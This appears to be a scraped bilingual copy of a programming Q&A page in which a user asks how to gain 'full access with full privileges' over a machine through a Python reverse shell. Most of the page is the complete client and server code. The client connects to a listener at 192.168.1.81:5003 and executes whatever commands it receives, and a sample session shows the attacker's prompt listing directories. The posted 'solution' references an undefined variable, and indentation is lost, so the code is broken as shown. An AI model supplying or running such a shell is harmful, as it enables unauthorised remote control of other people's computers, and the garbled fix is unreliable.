[英]Reverse Shell Command with Python command gets stuck when trying to change directory
I am trying to get full access with full privileges with a reverse shell with python.我正在尝试使用带有 python 的反向 shell 以完全权限获得完全访问权限。
The connections get established, and I can do a command like "ipconfig" or "dir" (although sometimes I need to ask twice before getting a result for "dir" command.连接建立后,我可以执行诸如“ipconfig”或“dir”之类的命令(尽管有时在获得“dir”命令的结果之前我需要询问两次。
However, when I try to change the directory with a "cd.." command, it gets stuck and does not return anything.但是,当我尝试使用“cd..”命令更改目录时,它会卡住并且不返回任何内容。
Here is my client file:这是我的客户端文件:
import socket
import subprocess
SERVER_HOST = "192.168.1.81"
SERVER_PORT = 5003
s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))
while True:
command = s.recv(1024).decode()
if command.lower() == "exit":
break
else:
output = subprocess.getoutput(command)
s.send(output.encode())
s.close()
Here is my server file:这是我的服务器文件:
import socket
SERVER_HOST = "192.168.1.81"
SERVER_PORT = 5003
s = socket.socket()
s.bind((SERVER_HOST, SERVER_PORT))
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")
while True:
command = input("Enter the command you wanna execute:")
client_socket.send(command.encode())
if command.lower() == "exit":
break
else:
results = client_socket.recv(1024).decode()
print(results)
client_socket.close()
s.close()
Here is what I get and where it gets stuck:这是我得到的以及卡住的地方:
Listening as 192.168.1.81:5003 ...
192.168.1.81:52553 Connected!
Enter the command you wanna execute:dir
Volume in drive C is Windows
Volume Serial Number is 7E4C-AD89
Directory of C:\Users\CobraCommander\PycharmProjects\Nuke
10/11/2020 08:45 AM <DIR> .
10/11/2020 08:45 AM <DIR> ..
10/11/2020 08:44 AM <DIR> .idea
10/11/2020 12:40 AM 0 Client.py
10/11/2020 08:45 AM 569 my_client.py
10/11/2020 12:40 AM 885 my_server.py
3 File(s) 1,454 bytes
3 Dir(s) 46,585,339,904 bytes free
Enter the command you wanna execute:cd..
# It gets stuck here, it does not return anything.
How do I get full access to the client and do any possible command?如何获得对客户端的完全访问权限并执行任何可能的命令?
Solved by using "os" library in the client file with the "os.chdir" method like so:通过使用“os.chdir”方法在客户端文件中使用“os”库解决,如下所示:
import socket
import subprocess
import os # Import this library
SERVER_HOST = "192.168.1.81"
SERVER_PORT = 5003
s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))
while True:
command = s.recv(1024).decode()
if data[:2].decode('utf-8') == 'cd':
os.chdir(data[3:].decode('utf-8')) # Use the method change directory called "os.chdir"
if command.lower() == "exit":
break
else:
output = subprocess.getoutput(command)
s.send(output.encode())
s.close()
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.